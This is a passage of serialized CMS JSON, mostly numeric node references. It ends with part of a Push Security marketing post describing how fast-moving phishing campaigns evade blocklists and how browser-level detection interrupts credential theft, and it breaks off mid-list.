ype":173,"value":81791,"marks":91885,"data":91886},[],{},{"nodeType":250,"data":91888,"content":91889},{},[91890,91899,91908,91917],{"nodeType":254,"data":91891,"content":91892},{},[91893],{"nodeType":178,"data":91894,"content":91895},{},[91896],{"nodeType":173,"value":81804,"marks":91897,"data":91898},[],{},{"nodeType":254,"data":91900,"content":91901},{},[91902],{"nodeType":178,"data":91903,"content":91904},{},[91905],{"nodeType":173,"value":81814,"marks":91906,"data":91907},[],{},{"nodeType":254,"data":91909,"content":91910},{},[91911],{"nodeType":178,"data":91912,"content":91913},{},[91914],{"nodeType":173,"value":81824,"marks":91915,"data":91916},[],{},{"nodeType":254,"data":91918,"content":91919},{},[91920],{"nodeType":178,"data":91921,"content":91922},{},[91923],{"nodeType":173,"value":81834,"marks":91924,"data":91925},[],{},{"nodeType":312,"data":91927,"content":91930},{"target":91928},{"sys":91929},{"id":81841,"type":317,"linkType":318},[],{"nodeType":178,"data":91932,"content":91933},{},[91934],{"nodeType":173,"value":81847,"marks":91935,"data":91936},[],{},{"nodeType":178,"data":91938,"content":91939},{},[91940,91943,91947],{"nodeType":173,"value":81854,"marks":91941,"data":91942},[],{},{"nodeType":173,"value":19231,"marks":91944,"data":91946},[91945],{"type":370},{},{"nodeType":173,"value":81862,"marks":91948,"data":91949},[],{},{"nodeType":250,"data":91951,"content":91952},{},[91953,91982,91991,92000,92009,92018],{"nodeType":254,"data":91954,"content":91955},{},[91956],{"nodeType":178,"data":91957,"content":91958},{},[91959,91962,91969,91972,91979],{"nodeType":173,"value":81875,"marks":91960,"data":91961},[],{},{"nodeType":186,"data":91963,"content":91964},{"uri":81880},[91965],{"nodeType":173,"value":81883,"marks":91966,"data":91968},[91967],{"type":194},{},{"nodeType":173,"value":81888,"marks":91970,"data":91971},[],{},{"nodeType":186,"data":91973,"content":91974},{"uri":81893},[91975],{"nodeType":173,"value":81896,"marks":91976,"data":91978},[91977],{"type":194},{},{"nodeType":173,"value":81901,"marks":91980,"data":91981},[],{},{"nodeType":254,"data":91983,"content":91984},{},[91985],{"nodeType":178,"data":91986,"content":91987},{},[91988],{"nodeType":173,"value":81911,"marks":91989,"data":91990},[],{},{"nodeType":254,"data":91992,"content":91993},{},[91994],{"nodeType":178,"data":91995,"content":91996},{},[91997],{"nodeType":173,"value":81921,"marks":91998,"data":91999},[],{},{"nodeType":254,"data":92001,"content":92002},{},[92003],{"nodeType":178,"data":92004,"content":92005},{},[92006],{"nodeType":173,"value":81931,"marks":92007,"data":92008},[],{},{"nodeType":254,"data":92010,"content":92011},{},[92012],{"nodeType":178,"data":92013,"content":92014},{},[92015],{"nodeType":173,"value":81941,"marks":92016,"data":92017},[],{},{"nodeType":254,"data":92019,"content":92020},{},[92021],{"nodeType":178,"data":92022,"content":92023},{},[92024],{"nodeType":173,"value":81951,"marks":92025,"data":92026},[],{},{"nodeType":312,"data":92028,"content":92031},{"target":92029},{"sys":92030},{"id":81958,"type":317,"linkType":318},[],{"nodeType":235,"data":92033,"content":92034},{},[92035],{"nodeType":173,"value":81964,"marks":92036,"data":92037},[],{},{"nodeType":178,"data":92039,"content":92040},{},[92041],{"nodeType":173,"value":81971,"marks":92042,"data":92043},[],{},{"nodeType":250,"data":92045,"content":92046},{},[92047,92056,92065,92074,92083,92092],{"nodeType":254,"data":92048,"content":92049},{},[92050],{"nodeType":178,"data":92051,"content":92052},{},[92053],{"nodeType":173,"value":81984,"marks":92054,"data":92055},[],{},{"nodeType":254,"data":92057,"content":92058},{},[92059],{"nodeType":178,"data":92060,"content":92061},{},[92062],{"nodeType":173,"value":81994,"marks":92063,"data":92064},[],{},{"nodeType":254,"data":92066,"content":92067},{},[92068],{"nodeType":178,"data":92069,"content":92070},{},[92071],{"nodeType":173,"value":82004,"marks":92072,"data":92073},[],{},{"nodeType":254,"data":92075,"content":92076},{},[92077],{"nodeType":178,"data":92078,"content":92079},{},[92080],{"nodeType":173,"value":82014,"marks":92081,"data":92082},[],{},{"nodeType":254,"data":92084,"content":92085},{},[92086],{"nodeType":178,"data":92087,"content":92088},{},[92089],{"nodeType":173,"value":82024,"marks":92090,"data":92091},[],{},{"nodeType":254,"data":92093,"content":92094},{},[92095],{"nodeType":178,"data":92096,"content":92097},{},[92098],{"nodeType":173,"value":82034,"marks":92099,"data":92100},[],{},{"nodeType":178,"data":92102,"content":92103},{},[92104],{"nodeType":173,"value":82041,"marks":92105,"data":92106},[],{},{"nodeType":178,"data":92108,"content":92109},{},[92110],{"nodeType":173,"value":82048,"marks":92111,"data":92112},[],{},{"nodeType":178,"data":92114,"content":92115},{},[92116],{"nodeType":173,"value":82055,"marks":92117,"data":92118},[],{},{"nodeType":312,"data":92120,"content":92123},{"target":92121},{"sys":92122},{"id":82062,"type":317,"linkType":318},[],{"nodeType":178,"data":92125,"content":92126},{},[92127],{"nodeType":173,"value":82068,"marks":92128,"data":92129},[],{},{"nodeType":235,"data":92131,"content":92132},{},[92133],{"nodeType":173,"value":82075,"marks":92134,"data":92135},[],{},{"nodeType":178,"data":92137,"content":92138},{},[92139],{"nodeType":173,"value":82082,"marks":92140,"data":92141},[],{},{"nodeType":312,"data":92143,"content":92146},{"target":92144},{"sys":92145},{"id":82089,"type":317,"linkType":318},[],{"nodeType":235,"data":92148,"content":92149},{},[92150],{"nodeType":173,"value":82095,"marks":92151,"data":92152},[],{},{"nodeType":178,"data":92154,"content":92155},{},[92156],{"nodeType":173,"value":82102,"marks":92157,"data":92158},[],{},{"nodeType":178,"data":92160,"content":92161},{},[92162],{"nodeType":173,"value":82109,"marks":92163,"data":92164},[],{},{"nodeType":312,"data":92166,"content":92169},{"target":92167},{"sys":92168},{"id":82116,"type":317,"linkType":318},[],{"nodeType":178,"data":92171,"content":92172},{},[92173,92176,92183],{"nodeType":173,"value":82122,"marks":92174,"data":92175},[],{},{"nodeType":186,"data":92177,"content":92178},{"uri":74370},[92179],{"nodeType":173,"value":82129,"marks":92180,"data":92182},[92181],{"type":194},{},{"nodeType":173,"value":82134,"marks":92184,"data":92185},[],{},{"nodeType":235,"data":92187,"content":92188},{},[92189],{"nodeType":173,"value":82141,"marks":92190,"data":92191},[],{},{"nodeType":178,"data":92193,"content":92194},{},[92195],{"nodeType":173,"value":82148,"marks":92196,"data":92197},[],{},{"nodeType":250,"data":92199,"content":92200},{},[92201,92210,92219,92228],{"nodeType":254,"data":92202,"content":92203},{},[92204],{"nodeType":178,"data":92205,"content":92206},{},[92207],{"nodeType":173,"value":82161,"marks":92208,"data":92209},[],{},{"nodeType":254,"data":92211,"content":92212},{},[92213],{"nodeType":178,"data":92214,"content":92215},{},[92216],{"nodeType":173,"value":82171,"marks":92217,"data":92218},[],{},{"nodeType":254,"data":92220,"content":92221},{},[92222],{"nodeType":178,"data":92223,"content":92224},{},[92225],{"nodeType":173,"value":82181,"marks":92226,"data":92227},[],{},{"nodeType":254,"data":92229,"content":92230},{},[92231],{"nodeType":178,"data":92232,"content":92233},{},[92234],{"nodeType":173,"value":82191,"marks":92235,"data":92236},[],{},{"nodeType":312,"data":92238,"content":92241},{"target":92239},{"sys":92240},{"id":82198,"type":317,"linkType":318},[],{"nodeType":231,"data":92243,"content":92244},{},[],{"nodeType":169,"data":92246,"content":92247},{},[92248],{"nodeType":173,"value":82207,"marks":92249,"data":92251},[92250],{"type":370},{},{"nodeType":178,"data":92253,"content":92254},{},[92255,92258,92265,92268],{"nodeType":173,"value":82215,"marks":92256,"data":92257},[],{},{"nodeType":186,"data":92259,"content":92260},{"uri":82220},[92261],{"nodeType":173,"value":82223,"marks":92262,"data":92264},[92263],{"type":194},{},{"nodeType":173,"value":2936,"marks":92266,"data":92267},[],{},{"nodeType":173,"value":82231,"marks":92269,"data":92271},[92270],{"type":370},{},{"nodeType":231,"data":92273,"content":92274},{},[],{"nodeType":169,"data":92276,"content":92277},{},[92278],{"nodeType":173,"value":2824,"marks":92279,"data":92281},[92280],{"type":370},{},{"nodeType":178,"data":92283,"content":92284},{},[92285],{"nodeType":173,"value":70343,"marks":92286,"data":92287},[],{},{"nodeType":178,"data":92289,"content":92290},{},[92291],{"nodeType":173,"value":70350,"marks":92292,"data":92293},[],{},{"nodeType":178,"data":92295,"content":92296},{},[92297,92300,92307],{"nodeType":173,"value":61741,"marks":92298,"data":92299},[],{},{"nodeType":186,"data":92301,"content":92302},{"uri":473},[92303],{"nodeType":173,"value":70364,"marks":92304,"data":92306},[92305],{"type":194},{},{"nodeType":173,"value":37,"marks":92308,"data":92309},[],{},{"items":92311},[92312,92314],{"sys":92313,"name":509},{"id":508},{"sys":92315,"name":505},{"id":504},{"items":92317},[92318],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":92319},{"url":2911},{"__typename":1528,"sys":92321,"content":92322,"title":61754,"synopsis":61755,"hashTags":118,"publishedDate":61756,"slug":61757,"tagsCollection":92895,"authorsCollection":92901},{"id":61098},{"json":92323},{"nodeType":165,"data":92324,"content":92325},{},[92326,92332,92338,92343,92363,92380,92383,92390,92396,92402,92409,92425,92428,92435,92441,92446,92452,92457,92460,92467,92473,92479,92500,92506,92536,92542,92549,92565,92571,92576,92599,92625,92632,92638,92644,92674,92677,92684,92700,92706,92727,92733,92738,92741,92748,92754,92863,92866,92873,92879],{"nodeType":178,"data":92327,"content":92328},{},[92329],{"nodeType":173,"value":61107,"marks":92330,"data":92331},[],{},{"nodeType":178,"data":92333,"content":92334},{},[92335],{"nodeType":173,"value":61114,"marks":92336,"data":92337},[],{},{"nodeType":312,"data":92339,"content":92342},{"target":92340},{"sys":92341},{"id":61121,"type":317,"linkType":318},[],{"nodeType":178,"data":92344,"content":92345},{},[92346,92349,92353,92356,92360],{"nodeType":173,"value":61127,"marks":92347,"data":92348},[],{},{"nodeType":173,"value":61131,"marks":92350,"data":92352},[92351],{"type":194},{},{"nodeType":173,"value":61136,"marks":92354,"data":92355},[],{},{"nodeType":173,"value":61140,"marks":92357,"data":92359},[92358],{"type":194},{},{"nodeType":173,"value":61145,"marks":92361,"data":92362},[],{},{"nodeType":178,"data":92364,"content":92365},{},[92366,92369,92377],{"nodeType":173,"value":61152,"marks":92367,"data":92368},[],{},{"nodeType":186,"data":92370,"content":92371},{"uri":61157},[92372],{"nodeType":173,"value":61160,"marks":92373,"data":92376},[92374,92375],{"type":194},{"type":370},{},{"nodeType":173,"value":1477,"marks":92378,"data":92379},[],{},{"nodeType":231,"data":92381,"content":92382},{},[],{"nodeType":169,"data":92384,"content":92385},{},[92386],{"nodeType":173,"value":61175,"marks":92387,"data":92389},[92388],{"type":370},{},{"nodeType":178,"data":92391,"content":92392},{},[92393],{"nodeType":173,"value":61183,"marks":92394,"data":92395},[],{},{"nodeType":178,"data":92397,"content":92398},{},[92399],{"nodeType":173,"value":61190,"marks":92400,"data":92401},[],{},{"nodeType":178,"data":92403,"content":92404},{},[92405],{"nodeType":173,"value":61197,"marks":92406,"data":92408},[92407],{"type":370},{},{"nodeType":178,"data":92410,"content":92411},{},[92412,92415,92422],{"nodeType":173,"value":61205,"marks":92413,"data":92414},[],{},{"nodeType":186,"data":92416,"content":92417},{"uri":61210},[92418],{"nodeType":173,"value":61213,"marks":92419,"data":92421},[92420],{"type":194},{},{"nodeType":173,"value":61218,"marks":92423,"data":92424},[],{},{"nodeType":231,"data":92426,"content":92427},{},[],{"nodeType":169,"data":92429,"content":92430},{},[92431],{"nodeType":173,"value":61228,"marks":92432,"data":92434},[92433],{"type":370},{},{"nodeType":178,"data":92436,"content":92437},{},[92438],{"nodeType":173,"value":61236,"marks":92439,"data":92440},[],{},{"nodeType":312,"data":92442,"content":92445},{"target":92443},{"sys":92444},{"id":61243,"type":317,"linkType":318},[],{"nodeType":178,"data":92447,"content":92448},{},[92449],{"nodeType":173,"value":61249,"marks":92450,"data":92451},[],{},{"nodeType":312,"data":92453,"content":92456},{"target":92454},{"sys":92455},{"id":61256,"type":317,"linkType":318},[],{"nodeType":231,"data":92458,"content":92459},{},[],{"nodeType":169,"data":92461,"content":92462},{},[92463],{"nodeType":173,"value":61265,"marks":92464,"data":92466},[92465],{"type":370},{},{"nodeType":178,"data":92468,"content":92469},{},[92470],{"nodeType":173,"value":61273,"marks":92471,"data":92472},[],{},{"nodeType":178,"data":92474,"content":92475},{},[92476],{"nodeType":173,"value":61280,"marks":92477,"data":92478},[],{},{"nodeType":250,"data":92480,"content":92481},{},[92482,92491],{"nodeType":254,"data":92483,"content":92484},{},[92485],{"nodeType":178,"data":92486,"content":92487},{},[92488],{"nodeType":173,"value":61293,"marks":92489,"data":92490},[],{},{"nodeType":254,"data":92492,"content":92493},{},[92494],{"nodeType":178,"data":92495,"content":92496},{},[92497],{"nodeType":173,"value":61303,"marks":92498,"data":92499},[],{},{"nodeType":178,"data":92501,"content":92502},{},[92503],{"nodeType":173,"value":61310,"marks":92504,"data":92505},[],{},{"nodeType":250,"data":92507,"content":92508},{},[92509,92518,92527],{"nodeType":254,"data":92510,"content":92511},{},[92512],{"nodeType":178,"data":92513,"content":92514},{},[92515],{"nodeType":173,"value":61323,"marks":92516,"data":92517},[],{},{"nodeType":254,"data":92519,"content":92520},{},[92521],{"nodeType":178,"data":92522,"content":92523},{},[92524],{"nodeType":173,"value":61333,"marks":92525,"data":92526},[],{},{"nodeType":254,"data":92528,"content":92529},{},[92530],{"nodeType":178,"data":92531,"content":92532},{},[92533],{"nodeType":173,"value":61343,"marks":92534,"data":92535},[],{},{"nodeType":178,"data":92537,"content":92538},{},[92539],{"nodeType":173,"value":61350,"marks":92540,"data":92541},[],{},{"nodeType":235,"data":92543,"content":92544},{},[92545],{"nodeType":173,"value":61357,"marks":92546,"data":92548},[92547],{"type":370},{},{"nodeType":178,"data":92550,"content":92551},{},[92552,92555,92562],{"nodeType":173,"value":61365,"marks":92553,"data":92554},[],{},{"nodeType":186,"data":92556,"content":92557},{"uri":61370},[92558],{"nodeType":173,"value":1255,"marks":92559,"data":92561},[92560],{"type":194},{},{"nodeType":173,"value":61377,"marks":92563,"data":92564},[],{},{"nodeType":178,"data":92566,"content":92567},{},[92568],{"nodeType":173,"value":61384,"marks":92569,"data":92570},[],{},{"nodeType":312,"data":92572,"content":92575},{"target":92573},{"sys":92574},{"id":61391,"type":317,"linkType":318},[],{"nodeType":178,"data":92577,"content":92578},{},[92579,92582,92586,92589,92596],{"nodeType":173,"value":61397,"marks":92580,"data":92581},[],{},{"nodeType":173,"value":61401,"marks":92583,"data":92585},[92584],{"type":370},{},{"nodeType":173,"value":61406,"marks":92587,"data":92588},[],{},{"nodeType":186,"data":92590,"content":92591},{"uri":832},[92592],{"nodeType":173,"value":835,"marks":92593,"data":92595},[92594],{"type":194},{},{"nodeType":173,"value":61417,"marks":92597,"data":92598},[],{},{"nodeType":178,"data":92600,"content":92601},{},[92602,92605,92612,92615,92622],{"nodeType":173,"value":61424,"marks":92603,"data":92604},[],{},{"nodeType":186,"data":92606,"content":92607},{"uri":14287},[92608],{"nodeType":173,"value":14290,"marks":92609,"data":92611},[92610],{"type":194},{},{"nodeType":173,"value":933,"marks":92613,"data":92614},[],{},{"nodeType":186,"data":92616,"content":92617},{"uri":61439},[92618],{"nodeType":173,"value":61442,"marks":92619,"data":92621},[92620],{"type":194},{},{"nodeType":173,"value":61447,"marks":92623,"data":92624},[],{},{"nodeType":235,"data":92626,"content":92627},{},[92628],{"nodeType":173,"value":61454,"marks":92629,"data":92631},[92630],{"type":370},{},{"nodeType":178,"data":92633,"content":92634},{},[92635],{"nodeType":173,"value":61462,"marks":92636,"data":92637},[],{},{"nodeType":178,"data":92639,"content":92640},{},[92641],{"nodeType":173,"value":61469,"marks":92642,"data":92643},[],{},{"nodeType":250,"data":92645,"content":92646},{},[92647,92656,92665],{"nodeType":254,"data":92648,"content":92649},{},[92650],{"nodeType":178,"data":92651,"content":92652},{},[92653],{"nodeType":173,"value":61482,"marks":92654,"data":92655},[],{},{"nodeType":254,"data":92657,"content":92658},{},[92659],{"nodeType":178,"data":92660,"content":92661},{},[92662],{"nodeType":173,"value":61492,"marks":92663,"data":92664},[],{},{"nodeType":254,"data":92666,"content":92667},{},[92668],{"nodeType":178,"data":92669,"content":92670},{},[92671],{"nodeType":173,"value":61502,"marks":92672,"data":92673},[],{},{"nodeType":231,"data":92675,"content":92676},{},[],{"nodeType":169,"data":92678,"content":92679},{},[92680],{"nodeType":173,"value":61512,"marks":92681,"data":92683},[92682],{"type":370},{},{"nodeType":178,"data":92685,"content":92686},{},[92687,92690,92697],{"nodeType":173,"value":61520,"marks":92688,"data":92689},[],{},{"nodeType":186,"data":92691,"content":92692},{"uri":4492},[92693],{"nodeType":173,"value":61527,"marks":92694,"data":92696},[92695],{"type":194},{},{"nodeType":173,"value":61532,"marks":92698,"data":92699},[],{},{"nodeType":178,"data":92701,"content":92702},{},[92703],{"nodeType":173,"value":61539,"marks":92704,"data":92705},[],{},{"nodeType":250,"data":92707,"content":92708},{},[92709,92718],{"nodeType":254,"data":92710,"content":92711},{},[92712],{"nodeType":178,"data":92713,"content":92714},{},[92715],{"nodeType":173,"value":61552,"marks":92716,"data":92717},[],{},{"nodeType":254,"data":92719,"content":92720},{},[92721],{"nodeType":178,"data":92722,"content":92723},{},[92724],{"nodeType":173,"value":61562,"marks":92725,"data":92726},[],{},{"nodeType":178,"data":92728,"content":92729},{},[92730],{"nodeType":173,"value":61569,"marks":92731,"data":92732},[],{},{"nodeType":312,"data":92734,"content":92737},{"target":92735},{"sys":92736},{"id":61576,"type":317,"linkType":318},[],{"nodeType":231,"data":92739,"content":92740},{},[],{"nodeType":169,"data":92742,"content":92743},{},[92744],{"nodeType":173,"value":61585,"marks":92745,"data":92747},[92746],{"type":370},{},{"nodeType":178,"data":92749,"content":92750},{},[92751],{"nodeType":173,"value":61593,"marks":92752,"data":92753},[],{},{"nodeType":250,"data":92755,"content":92756},{},[92757,92786,92815,92834],{"nodeType":254,"data":92758,"content":92759},{},[92760],{"nodeType":178,"data":92761,"content":92762},{},[92763,92766,92773,92776,92783],{"nodeType":173,"value":37,"marks":92764,"data":92765},[],{},{"nodeType":186,"data":92767,"content":92768},{"uri":61610},[92769],{"nodeType":173,"value":61613,"marks":92770,"data":92772},[92771],{"type":194},{},{"nodeType":173,"value":61618,"marks":92774,"data":92775},[],{},{"nodeType":186,"data":92777,"content":92778},{"uri":61623},[92779],{"nodeType":173,"value":61626,"marks":92780,"data":92782},[92781],{"type":194},{},{"nodeType":173,"value":53584,"marks":92784,"data":92785},[],{},{"nodeType":254,"data":92787,"content":92788},{},[92789],{"nodeType":178,"data":92790,"content":92791},{},[92792,92795,92802,92805,92812],{"nodeType":173,"value":37,"marks":92793,"data":92794},[],{},{"nodeType":186,"data":92796,"content":92797},{"uri":19838},[92798],{"nodeType":173,"value":39940,"marks":92799,"data":92801},[92800],{"type":194},{},{"nodeType":173,"value":61650,"marks":92803,"data":92804},[],{},{"nodeType":186,"data":92806,"content":92807},{"uri":61655},[92808],{"nodeType":173,"value":61658,"marks":92809,"data":92811},[92810],{"type":194},{},{"nodeType":173,"value":61663,"marks":92813,"data":92814},[],{},{"nodeType":254,"data":92816,"content":92817},{},[92818],{"nodeType":178,"data":92819,"content":92820},{},[92821,92824,92831],{"nodeType":173,"value":37,"marks":92822,"data":92823},[],{},{"nodeType":186,"data":92825,"content":92826},{"uri":9275},[92827],{"nodeType":173,"value":9278,"marks":92828,"data":92830},[92829],{"type":194},{},{"nodeType":173,"value":61683,"marks":92832,"data":92833},[],{},{"nodeType":254,"data":92835,"content":92836},{},[92837],{"nodeType":178,"data":92838,"content":92839},{},[92840,92843,92850,92853,92860],{"nodeType":173,"value":37,"marks":92841,"data":92842},[],{},{"nodeType":186,"data":92844,"content":92845},{"uri":61697},[92846],{"nodeType":173,"value":57951,"marks":92847,"data":92849},[92848],{"type":194},{},{"nodeType":173,"value":61704,"marks":92851,"data":92852},[],{},{"nodeType":186,"data":92854,"content":92855},{"uri":61709},[92856],{"nodeType":173,"value":61712,"marks":92857,"data":92859},[92858],{"type":194},{},{"nodeType":173,"value":61717,"marks":92861,"data":92862},[],{},{"nodeType":231,"data":92864,"content":92865},{},[],{"nodeType":169,"data":92867,"content":92868},{},[92869],{"nodeType":173,"value":18605,"marks":92870,"data":92872},[92871],{"type":370},{},{"nodeType":178,"data":92874,"content":92875},{},[92876],{"nodeType":173,"value":61734,"marks":92877,"data":92878},[],{},{"nodeType":178,"data":92880,"content":92881},{},[92882,92885,92892],{"nodeType":173,"value":61741,"marks":92883,"data":92884},[],{},{"nodeType":186,"data":92886,"content":92887},{"uri":473},[92888],{"nodeType":173,"value":1472,"marks":92889,"data":92891},[92890],{"type":194},{},{"nodeType":173,"value":1477,"marks":92893,"data":92894},[],{},{"items":92896},[92897,92899],{"sys":92898,"name":509},{"id":508},{"sys":92900,"name":505},{"id":504},{"items":92902},[92903],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":92904},{"url":8615},{"__typename":1528,"sys":92906,"content":92908,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":93524,"authorsCollection":93530},{"id":92907},"XQHcBu5kiSBd6MMwICYI4",{"json":92909},{"nodeType":165,"data":92910,"content":92911},{},[92912,92919,92926,92934,92963,92970,92976,92979,92987,92994,93001,93044,93051,93058,93061,93069,93076,93083,93090,93108,93115,93121,93129,93136,93143,93150,93156,93159,93167,93175,93182,93190,93197,93259,93266,93274,93281,93314,93322,93329,93337,93344,93352,93359,93412,93419,93422,93430,93437,93454,93487,93508,93514],{"nodeType":178,"data":92913,"content":92914},{},[92915],{"nodeType":173,"value":92916,"marks":92917,"data":92918},"Phishing has undergone a radical transformation. The laughably bad emails and fake PayPal logins of the past have given way to sophisticated campaigns engineered to slip through even the most hardened security stacks. ",[],{},{"nodeType":178,"data":92920,"content":92921},{},[92922],{"nodeType":173,"value":92923,"marks":92924,"data":92925},"Today’s phishing attacks are faster, more adaptable, and harder to catch with traditional tools. Email filters and threat intel still play an important role, but they’re often reacting to threats that are already in motion, and by the time a phishing link is flagged and blocklisted, someone has probably already clicked — and the attacker has moved onto their next set of links.",[],{},{"nodeType":178,"data":92927,"content":92928},{},[92929],{"nodeType":173,"value":92930,"marks":92931,"data":92933},"The problem isn’t that phishing has evolved. It’s that our defenses haven’t.",[92932],{"type":370},{},{"nodeType":178,"data":92935,"content":92936},{},[92937,92941,92950,92954,92959],{"nodeType":173,"value":92938,"marks":92939,"data":92940},"That’s where ",[],{},{"nodeType":186,"data":92942,"content":92944},{"uri":92943},"https://pushsecurity.com/uc/zero-day-phishing-protection",[92945],{"nodeType":173,"value":92946,"marks":92947,"data":92949},"Push Security",[92948],{"type":194},{},{"nodeType":173,"value":92951,"marks":92952,"data":92953}," comes in. By embedding real-time detection directly into the browser, the very place where phishing attacks unfold, Push offers a fundamentally new way to stop phishing: ",[],{},{"nodeType":173,"value":92955,"marks":92956,"data":92958},"as it happens",[92957],{"type":1646},{},{"nodeType":173,"value":92960,"marks":92961,"data":92962},", regardless of whether or not the exact attack has ever been seen before. ",[],{},{"nodeType":178,"data":92964,"content":92965},{},[92966],{"nodeType":173,"value":92967,"marks":92968,"data":92969},"Check out the video to see how it works. ",[],{},{"nodeType":312,"data":92971,"content":92975},{"target":92972},{"sys":92973},{"id":92974,"type":317,"linkType":318},"4LaKobadjp19jjocLXcW4E",[],{"nodeType":231,"data":92977,"content":92978},{},[],{"nodeType":169,"data":92980,"content":92981},{},[92982],{"nodeType":173,"value":92983,"marks":92984,"data":92986},"The modern phishing playground",[92985],{"type":370},{},{"nodeType":178,"data":92988,"content":92989},{},[92990],{"nodeType":173,"value":92991,"marks":92992,"data":92993},"Phishing attacks today look nothing like the blunt instruments of a few years ago. These are fast, customized, and often completely ephemeral. A phishing domain might go live at 9 a.m., compromise scores of credentials, and be gone before lunch, long before it ever hits a threat intel feed.",[],{},{"nodeType":178,"data":92995,"content":92996},{},[92997],{"nodeType":173,"value":92998,"marks":92999,"data":93000},"Modern attackers use:",[],{},{"nodeType":250,"data":93002,"content":93003},{},[93004,93014,93024,93034],{"nodeType":254,"data":93005,"content":93006},{},[93007],{"nodeType":178,"data":93008,"content":93009},{},[93010],{"nodeType":173,"value":93011,"marks":93012,"data":93013},"Dynamic content and user-adaptive emails that can be easily changed based on the target’s identity and environment.",[],{},{"nodeType":254,"data":93015,"content":93016},{},[93017],{"nodeType":178,"data":93018,"content":93019},{},[93020],{"nodeType":173,"value":93021,"marks":93022,"data":93023},"Obfuscated URLs hidden behind trusted services (like Google Sites), making reputation analysis less than reliable.",[],{},{"nodeType":254,"data":93025,"content":93026},{},[93027],{"nodeType":178,"data":93028,"content":93029},{},[93030],{"nodeType":173,"value":93031,"marks":93032,"data":93033},"Real-time proxying tools to clone login flows and harvest credentials.",[],{},{"nodeType":254,"data":93035,"content":93036},{},[93037],{"nodeType":178,"data":93038,"content":93039},{},[93040],{"nodeType":173,"value":93041,"marks":93042,"data":93043},"Rapid-fire infrastructure rotation, making the attack’s infrastructure almost impossible to track in time.",[],{},{"nodeType":178,"data":93045,"content":93046},{},[93047],{"nodeType":173,"value":93048,"marks":93049,"data":93050},"These attacks often bypass traditional defenses entirely, not because the tools are broken, but because they were designed for a different era, one where phishing pages lived for days or weeks, not minutes.",[],{},{"nodeType":178,"data":93052,"content":93053},{},[93054],{"nodeType":173,"value":93055,"marks":93056,"data":93057},"It’s not enough to know what was bad yesterday. You need to know what’s happening now.",[],{},{"nodeType":231,"data":93059,"content":93060},{},[],{"nodeType":169,"data":93062,"content":93063},{},[93064],{"nodeType":173,"value":93065,"marks":93066,"data":93068},"Why blocklists and perimeter defenses are falling behind",[93067],{"type":370},{},{"nodeType":178,"data":93070,"content":93071},{},[93072],{"nodeType":173,"value":93073,"marks":93074,"data":93075},"The security ecosystem has long depended on reputation-based systems: block the known bad, allow the rest. That worked when attackers reused infrastructure and relied on mass campaigns. Today’s adversaries have adapted.",[],{},{"nodeType":178,"data":93077,"content":93078},{},[93079],{"nodeType":173,"value":93080,"marks":93081,"data":93082},"Consider a scenario similar to the one from our video:",[],{},{"nodeType":178,"data":93084,"content":93085},{},[93086],{"nodeType":173,"value":93087,"marks":93088,"data":93089},"A staff member receives an email appearing to be from Microsoft Teams. It includes dynamic content that mirrors their actual environment, including their username, company logo, and real collaboration data. The embedded link takes them to a cloned Microsoft login page hosted on a benign-looking subdomain. The site is brand new. It’s not on any blocklist. Your email filter passes it. The employee logs in. Credentials and session tokens? Gone.",[],{},{"nodeType":178,"data":93091,"content":93092},{},[93093,93097,93104],{"nodeType":173,"value":93094,"marks":93095,"data":93096},"And that’s just step one. The attacker now pivots to connected apps like ",[],{},{"nodeType":186,"data":93098,"content":93099},{"uri":27726},[93100],{"nodeType":173,"value":27729,"marks":93101,"data":93103},[93102],{"type":194},{},{"nodeType":173,"value":93105,"marks":93106,"data":93107},", Confluence, or AWS, moving laterally through your cloud environment using the compromised credentials.",[],{},{"nodeType":178,"data":93109,"content":93110},{},[93111],{"nodeType":173,"value":93112,"marks":93113,"data":93114},"Traditional tools often miss these threats not due to a lack of sophistication, but because they’re looking from the outside in. The browser is where the attack actually unfolds. Without visibility there, key indicators of compromise go undetected.",[],{},{"nodeType":312,"data":93116,"content":93120},{"target":93117},{"sys":93118},{"id":93119,"type":317,"linkType":318},"1UGu43QxCiYofkeGtOMp5J",[],{"nodeType":169,"data":93122,"content":93123},{},[93124],{"nodeType":173,"value":93125,"marks":93126,"data":93128},"Rethinking where phishing defense happens",[93127],{"type":370},{},{"nodeType":178,"data":93130,"content":93131},{},[93132],{"nodeType":173,"value":93133,"marks":93134,"data":93135},"Push changes where phishing protection happens, from upstream detection to point-of-interaction control. Instead of chasing malicious links through email gateways or external threat feeds, Push embeds lightweight, always-on protection directly, as users go about their work in the browser.",[],{},{"nodeType":178,"data":93137,"content":93138},{},[93139],{"nodeType":173,"value":93140,"marks":93141,"data":93142},"Push monitors what’s happening in each session: how pages are built, how they behave, and how users interact with them. That means it can recognize when a login prompt doesn’t match your identity provider or when a script behaves like part of a phishing toolkit.",[],{},{"nodeType":178,"data":93144,"content":93145},{},[93146],{"nodeType":173,"value":93147,"marks":93148,"data":93149},"When Push identifies something suspicious, it takes action right away. Logins are interrupted before any data is exposed. Users get clear guidance in-browser. And security teams receive detailed telemetry that shows exactly what happened, who was targeted, and how the threat was stopped.",[],{},{"nodeType":312,"data":93151,"content":93155},{"target":93152},{"sys":93153},{"id":93154,"type":317,"linkType":318},"7Hu3kypFWwJAGOuQp0kYmU",[],{"nodeType":231,"data":93157,"content":93158},{},[],{"nodeType":169,"data":93160,"content":93161},{},[93162],{"nodeType":173,"value":93163,"marks":93164,"data":93166},"The benefits of browser-native phishing defense",[93165],{"type":370},{},{"nodeType":235,"data":93168,"content":93169},{},[93170],{"nodeType":173,"value":93171,"marks":93172,"data":93174},"True zero-day protection",[93173],{"type":370},{},{"nodeType":178,"data":93176,"content":93177},{},[93178],{"nodeType":173,"value":93179,"marks":93180,"data":93181},"Push doesn’t rely on known indicators of compromise. It evaluates the actual behavior and context of every session in real-time. Whether the phishing site was created 5 months ago or 5 minutes ago is irrelevant — Push detects it and shuts it down.",[],{},{"nodeType":235,"data":93183,"content":93184},{},[93185],{"nodeType":173,"value":93186,"marks":93187,"data":93189},"Contextual threat detection",[93188],{"type":370},{},{"nodeType":178,"data":93191,"content":93192},{},[93193],{"nodeType":173,"value":93194,"marks":93195,"data":93196},"Because Push operates in the browser, it sees everything:",[],{},{"nodeType":250,"data":93198,"content":93199},{},[93200,93210,93220,93239,93249],{"nodeType":254,"data":93201,"content":93202},{},[93203],{"nodeType":178,"data":93204,"content":93205},{},[93206],{"nodeType":173,"value":93207,"marks":93208,"data":93209},"The page 